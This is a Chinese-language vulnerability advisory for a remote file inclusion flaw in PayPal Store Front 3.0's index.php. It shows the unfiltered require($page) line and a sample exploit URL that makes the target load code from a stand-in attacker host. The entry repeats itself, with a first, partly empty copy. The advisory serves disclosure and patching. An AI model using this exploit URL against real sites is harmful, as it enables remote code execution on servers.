PayPal Store Front index.php远程文件包含漏洞
添加时间:
2005-08-16
系统编号:
WAVDB-00414
BUGTRAQ: 8791
影响版本:
PayPal Store Front 3.0
程序介绍:
漏洞利用:
解决方案:
厂商补丁:
PayPal Store Front
------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.zone-h.org/download/file=4957
信息来源:
<*来源:Zone-H (http://www.zone-h.org)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106562986710798&w=2 *>
2005-08-16
系统编号:
WAVDB-00414
BUGTRAQ: 8791
影响版本:
PayPal Store Front 3.0
程序介绍:
PayPal Store Front是一款适合小型用户使用的在线购买系统。
漏洞分析:
PayPal Store Front包含的index.php文件对用户提交输入缺少充分过滤,远程攻击者可以利用这个漏洞以WEB权限在目标系统上执行任意命令。
由于index.php包含如下代码:
require ($page . .php );
由于对用户提交的$page变量数据缺少充分过滤,远程攻击者可以提交包含恶意服务器上的文件作为变量参数,导致系统包含远程文件,以WEB权限执行包含的恶意代码。
漏洞利用:
http://www.vulnsite.com/index.php?do=ext&page=http://www.attacker.com/index
解决方案:
厂商补丁:
PayPal Store Front
------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.zone-h.org/download/file=4957
信息来源:
<*来源:Zone-H (http://www.zone-h.org)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106562986710798&w=2 *>